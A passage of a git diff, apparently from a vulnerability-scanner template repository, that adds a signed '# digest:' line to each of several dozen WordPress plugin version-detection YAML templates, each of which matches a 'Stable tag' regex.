'(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220205f23916297aa39b6ef5fde4242703606ba970a1600ba2dacf6b5c79a2bd78402201d46a8e3a2026ed2503265eae62180fabcc12c46eea62a5ff7c37cc148199849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..7a8c42d30e 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7b520980f5be3c1b167fa19e7d2646fa3ee4f77a9796a38ff7c1fa1ee9df6cc02200437657dcb6298913fe53451a245c913cb99cd9951e2b8fe2ee989a04d4220c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..13e6271245 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf39dc73ebc5f3e1490b6afe629bae23ef8c29a874493bb71951362722b7aa07022100def12e703e8774eb4a7badf0e5d25feeb0d4ce7c41c49e01959b662c4995afee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..8b60038a61 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf00d69b841228e45375bcd476390d397febdaa2b7075731bbc3c0a762834524022036e349db19dd6ffebcfeed6794b4f50aed76f88532b0ec324350a7662f1228aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..0360c94b83 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a004530430220093aeb789258544ddbdfe3001269740549b3514c3c6f543385e2eab1e3c714fc021f6ea1e7b7ac63afbc7f3ad8eaa8bf54316f8b1c2013292d543bb7ee5bd0aa8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..89853142ff 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100936350b92d3d5d54a132b08377a4a8f3794f554bcb9dd1af73e0ec4118b6e131022100fd919489ea2855b3c9c5c8b6b2dfa5b2707ddffb2907478641fc45dee8317ae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..98d3ffbd14 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220445ede26cd32cadcc383ee0b93f9e8003a5c93c5ec1124f4f9c6c747e3d00dd502206c1978b6d90aae34960403ed7036bb320d770a8e1b2791274b25dd3c32335f26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..abb4812e94 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ff4221fd50cc6978ee7ade1116ae253d8ee0ceceae9c72a476667da150b7e285022100e266c96dfa2b2112aabf7f99008af1324fd220b67695bf64639d736030a87014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..06131fc78d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045c324f301105020858c6272443e8afd58b109f2ab4923af083b407b550886bb022002672116954b7e6d229d5e8287a86920f3aa017e548372d5d2d0ae1deed2df5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..6d03a33233 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f69468ded2c6590eae293e92798c3c38d91c19da154ded90057a51328f19236022072c952edc96e50d4d7c14ca01816c4cf22563ac505308b8d75abc45705a01a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..91b37beeb1 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df20c93eb4c061355cfeb75ba953616cf389b280ad31915eb30e60b917f2b96e022100e7aea68c345f351ef71388ac5fcd11c45bee8902bd2697d355234764779028af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..6d959303fa 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220443ac7d2b73046306693fd6228ca8ac0e44d597b60ae4c9c2e252bb3f079ac96022100b523879f99c4a03eb67d53132f60724e7d14df2d099a5fa71afd44192ec07405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..fd1c4c62e3 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bad56c53fd88707e922e905ab0e40c9febfe8bf60de324d80289f4b99a75b807022100d8770bc4eaca0a018fa9ab2f035f473776b7039a8a28c24bb2661828df8669c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..2751fdf88f 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008190fea18cf435d5cd983b1291e8eea7aa0a6df026350ca798dd09b24f8e37570220409fc61470f0bd0fe31727623e13dc0b2117d4b5871148622a68f4375c0fed27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..a0647952cb 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220010a6287370076a390ddba157ae2ba9b5308d98e222dd6ce27623d5a4e5b18b4022100c02f2c2073501da09ad3406787c7c7f2b961bd6196890fbc9ed5928583a62214:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..50c7da225f 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022014b9594f15a8ba207d3f2e061c5c5efa6e5bad6a2372c1462063bff3632f6fd8022100d560cef276e4d681b361240ac7e4100aee74b8192a43e2404c4181edf19a1e60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..e0a7c9808b 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220695baf82a80c59727d9400f602900b848593d479f958e470b121ae1f3f1d44c0022100ab017f4b0030863061626673fb7a89e51af78d0ae1a8bf096ea120fec807ccfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..770db8b3ba 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034e1c4bec904f226e723aa6dd9f1a1835f0f90ecb3cf1657a61efb8b20d7293e022013fdc96c3d887012762e6cb82eac26c0d4b7650b8af42fa6094df95cef98fe34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..7f19677e85 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b19ef3b4199650cb799a577b3330a06d9d9803bd68fd6ce05c4fcd1063f7240022100c49e3b43cefc7add40fc95faa151e23f91e8867a3212f82d85fa6aa7945c7c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..ab7740a4cb 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b5a11002bf3561783abaed70a8abd59f0d439f370950a2070d73b3772b299df0022100a850a588a5fcd2562f6681ef9bcca8a59ac7d2087c2e8d2452064eb4aceb3f0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..ad2cd5fb8b 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f486407128539515cb70e6d621f694120fa6d20105b6cdf2031ee92803dcd6c0220677d6b7c10e280238f9dd7e15102a47554bbcaf6fc6bf460e0391be50f677f42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..22bb6f22ba 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b121150f32e656d029f72fd85576cfd2bba6c04a3806f6e0817bc5be3c05a191022016a1f27f724dd34bbadf74723a5f4c48a8f8ac4bb55156e6eb44246ad7e70116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..5a42f41456 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f95244c48676874a8e0043425dd712257ead8288634c4e86f303dcc1053f47602202f7a343ab06d2033a9a919d6b47f8d2d277767fea68f1ed246f160ceeb7e4a9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..2bdbd9cfe1 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220079161c4fc448a53a31a700cfe47d1f97659b7dbe13fcd0cfcbbee390d16e7b1022100ee4c5f1705ab8fb2ae9f848a4d7eb7d41cd911881131cb4607d4a59d842f04f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..abdd20948d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203c5f7e54a22056bfb5044b4e181a0825294d5287d01844bb707e532477946f660220050ded95651d286f0c6d025a9ab490f1a065c828679d489d3cc3511149c53aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..76d21f07c7 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210096d3115d5ef9d5e678e17a7eddac81724ef738bf53a56956739d6067f743bd1b02207b0cea3981db5343165cb119be65b2167c5917d35da6e8506701cd237f355174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..c57ce4b9be 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008db1bda45be3521781661824717ec6503f3c33ec23b991003b2a441fd96abbab0220356cf8e9994a4a0962cd09e153a83f96b73d51d59be01b6c94066199c9c799bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..a883b44cfd 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012c0c8215866b450ddcd8db47d555ad93012a5d75d877eca35e5931a908c4af4022100d151abe74b8565eab97a964a5f7b330eb6471f55f4d471a1eccb58a691ed7ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..81cf755362 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0ab0e0966b909d1530e5210859b19b6bafd767d2effba0718a9f3e16a8a7734022100b7ff21f8e2e715de2e78a96bd8086333721e16e1e260b1aef16753064fec1beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..835347ec68 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202266f3743bce2b08ab3e2411f4051c53718b9317abe46ade535f2db54ecfdcdc022100b483d0a7c2e585f545b1ee9d5453e8cd834835cbd6bea5257347e90c20abe879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..ba772c889e 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022074270c2e423d8f6f284751be894600965bfb358e4c478669fe4c6d8bca99cc3a022100d539d88bae915b0d997ebf3ae019b2745c7ad9b46e44c6fbe46c8d52f845cb15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..8846606d62 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d8ddcce446e439879b2573a71e5f82cc829ba5526ec3e8af0a131b86fb69c712022066c0be0356f3ef5e25404ceabfd43ec678482be42f23b834f320e2ff3cd30c3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..290db9fe5e 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220358378a4329691af07e4535c45f69ef92fd0bf98fc430b5e0c14f81ddcecc90302201dbd3a41230b88244b5aaab7470d8bccf1c974c52c891bfdd05eb766173eec3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..17e18e6a75 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec3a22944c38e6e0fa36f99c349a327cf1a655ce1688e36c087cd5142de7645a022074c87d5dedcd45f88dc61063a4108cf2e8e89de3c89518a8902e764d96a65b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..5c0bb7e445 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207253fc6b7fd32c134813f9eddf87963e2897570b4ae8361681926dc06a2ded2e022100dd9fdfe9884612114ef02a3aebdcda933bdd608d5b2d8fe01caed2fa9271167d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..42a537112c 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd454ddc6b7e2ab008a9b9f3c87d2458b02bbd117a96c4bee75095bacf741985022100dad09739bee2ac293075fc188addbd33285fdb1440251076b436d09d7de10de6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..4726be8f14 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204dbd9e3918703ed6e45c04b9e0ad25fc6e28e3b32613bc2c8864fcdb33b5a196022060d01aae5953ea4da166e24416090d05cd3bfd9712bde3ee8e310464910d2181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..195dfe9bad 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075f4aea2e7fb75c775132b1805fa4c05fa47a4a38d8959701dd221ad78582351022100ee56f99192d32e271a5cd4555f23e816305b7371a5d573ecafed88b9f8a3095a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..3acfe613f8 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e19fdac1f587bbb3d4f7c64b8e02bf26e0a452f5cfccad8c047074dfb10aa3d50220756f5f66e404db56ba52bdae31192e0416747a3f30b0c5bbe3d0ff37e97dd5ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..743dc948fb 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f0ced598e8b5f9cad246c1b2986e31da108b8f979b45e2167197f3a27893dad02205c4f509cb56e647240140b1537eb253a8bd49a02958aa51c94999b9639404373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..bd8c965624 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a512274f1c7078a8459d96d2567fd849b0525ef5beb688103a005b304858ee4102203d069ab818ab2e854ffa18638453721751d620d8e522b2bc6e5c1344227e7c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..788933d914 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220693dc7287d237ff60a83fdabc5c3cf1b8f1b1b383c576ac59dcb5c7657d8f927022100f5fcac3bfb8f98318e48fe2d85d87e6cbdcf2f38b7f3a2c9c122abb59831689e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..9bb0f57bb1 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012a42e9194794d64187c48dcd017e3c54c86ed18987b7d66743acfd13caebfde022100a0b4523c073f0bcfeaa972c36048be283742f79296cc6cb6e0bf662d9b376ef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..6e19228e03 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008ce949c4768918ba2794f17c2981df41cfeba83caa83d5e34fa361b77f8dec70022100cd2c8aff9d37fe823e1b895131aafde91dcdd3bd2fea8fe99b887debccd4a9ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..0b4f988394 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c098be68db454319ecb11ed54fc7d74a1a7224f53224942891a477877cb27be3022100b97c55f2cd5331f8e0265872b9be5d81f392145f44e0b1ccc7c046468da55a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..e5444a6823 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b8ec25efa468f1f9c2c3e06af6d3ddc578a97d1c767f2fc22a6b5efa4c8c1b390220485f3f80f48878fafbf119b379b8f35851fc38751184673676a6884c7bac94a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..492649f361 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b37a5bb840d4e4b3623e049a02ef5d7a162f1e270745ba80393005edbbd56df802200d2b513dbed91bbf4cedf2f2e6f882d59f7c3c3b4384907d1e054629aa4bec29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..bc60a5e556 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 